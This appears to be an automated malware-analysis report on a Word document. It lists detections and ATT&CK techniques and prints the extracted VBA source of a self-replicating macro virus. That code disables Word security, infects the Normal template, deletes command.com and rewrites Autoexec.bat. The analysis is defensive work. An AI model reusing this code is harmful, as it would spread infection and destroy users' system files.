Verdict: MALICIOUS
Risk Score: 320
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1204.002 Malicious File
The sample contains legacy WordBasic macro virus markers and critical VBA heuristics indicating the presence of a Shell() call and auto-execution via the Document_Open macro. The script attempts to disable security features and execute code, likely to download and run a second-stage payload. The ClamAV detection of 'Win.Trojan.Psycho-3' and 'Doc.Trojan.Tarap-1' further supports its malicious nature.
Heuristics (6)
- ClamAV: Win.Trojan.Psycho-3 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Win.Trojan.Psycho-3
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code
- Shell() call in VBA [critical, OLE_VBA_SHELL]: Shell() call in VBA
- Document_Open macro [high, OLE_VBA_DOCOPEN]: Document_Open macro
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic macro-virus markers [high, OLE_LEGACY_WORDBASIC_MACRO_VIRUS]: OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5901 bytes |

SHA-256: 95ce50e4eb3b8eb93505d4ae9f8cc02bd12d3e88f3339fc850c8f8266a9eb981
Detection (ClamAV): Doc.Trojan.Tarap-1
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub document_open()
On Error Resume Next
VBE.MainWindow.Visible = False
With Options: .VirusProtection = False: .SaveNormalPrompt = False: .ConfirmConversions = False: End With
FindKey(BuildKeyCode(wdKeyF11, wdKeyAlt)).Disable: FindKey(BuildKeyCode(wdKeyF8, wdKeyAlt)).Disable: WordBasic.DisableAutoMacros 0
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
'The dark
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
CommandBars("Macro").Controls("Seguridad...").Enabled = False
End If
ayah = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines: aya = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
ID = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(7, 1)
If ID <> "'The dark" Then
If ayah >= 1 Then
With NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
For q = 1 To ayah
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1
Next q
End With
End If
End If
p = VBE.CommandBars.Count: pp = VBE.Windows.Count
For L = 1 To p
VBE.CommandBars.Item(L).Enabled = False
Next L
For L = 1 To pp
VBE.Windows.Item(L).Visible = False
Next L
If ayah < 81 Then
Set host = NormalTemplate.VBProject.VBComponents.Item(1)
ActiveDocument.VBProject.VBComponents.Item(1).Name = host.Name: ActiveDocument.VBProject.VBComponents.Item(1).Export "c:\windows\wind.sys": ActiveDocument.VBProject.VBComponents.Item(2).Export "c:\windows\wtv.dll": NormalTemplate.VBProject.VBComponents.Import "c:\windows\wtv.dll"
End If
If aya = 0 Then
Set host = ActiveDocument.VBProject.VBComponents.Item(1)
ActiveDocument.VBProject.VBComponents.Import "c:\windows\wtv.dll"
End If
host.CodeModule.AddFromFile ("c:\windows\wind.sys")
With host.CodeModule
For x = 1 To 4
.DeleteLines 1
Next x
End With
Randomize
a = Int((30 * Rnd) + 1): If Day(Now) = a Then MsgBox "The Dark is Ready... Este documento es una basura", 2046, "Tarapoto Virus 2000"
If Day(Now) = 1 And (Month(Now) Mod 2 = 0) Then MsgBox Application.UserName & ": Tu Pc esta bajo mi control; Visita Tarapoto Ciudad de las Palmeras. Virus creado por 'The Dark' tpp e-mail:thedarktpp@mixmail.com ", 0, "TARAPOTO VIRUS/tpp.win": Call tppform.Show
If Day(Now) = 1 And (Month(Now) = 9) Then
MsgBox "Hoy cumple " & Year(Now) - 1979 & " años mi creador 'The Dark' y por eso nadie trabaja hoy. ", 4096, "TARAPOTO VIRUS/tpp.win"
Kill ("c:\command.com"): Shell ("c:\windows\rundll32.exe user,exitwindows")
End If
If ayah < 81 Then
With host.CodeModule:
.replaceline 1, "Sub document_close()": .replaceline 73, "Sub ViewVBcode()"
.replaceline 76, "Sub HelpAbout()": .replaceline 79, "Sub ToolsMacro()"
.replaceline 82, "Sub ToolsCustomizeKeyboard()": .replaceline 85, "Sub FileSaveAs()"
.replaceline 88, "End Sub"
End With
End If
If Day(Now) = 15 Then
Open "c:\Autoexec.bat" For Input As #1
Dim w, y: y = 0
Do While Not EOF(1)
Line Input #1, w: Debug.Print w
If w = "rem the dark" Then y = 1
Loop
Close #1
If y = 0 Then
Name ("c:\Autoexec.bat") As ("c:\autoexe.bat")
Close: Open "c:\Autoexec.bat" For Output As #1: Print #1, "@ echo off": Print #1, "rem the dark": Print #1, "echo TaRaPoTo's Soft Copyright 1999 - 2002 ": Print #1, "echo by: The Dark ": Print #1, "echo e-mail: thedarktpp@mixmail.com": Print #1, "echo. ": Print #1, "pause": Print #1, "Autoexe": Close #1
End If
End If
If ayah >= 88 And aya = 0 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End Sub
Sub FileTemplates()
Shell ("c:\wi
... (truncated)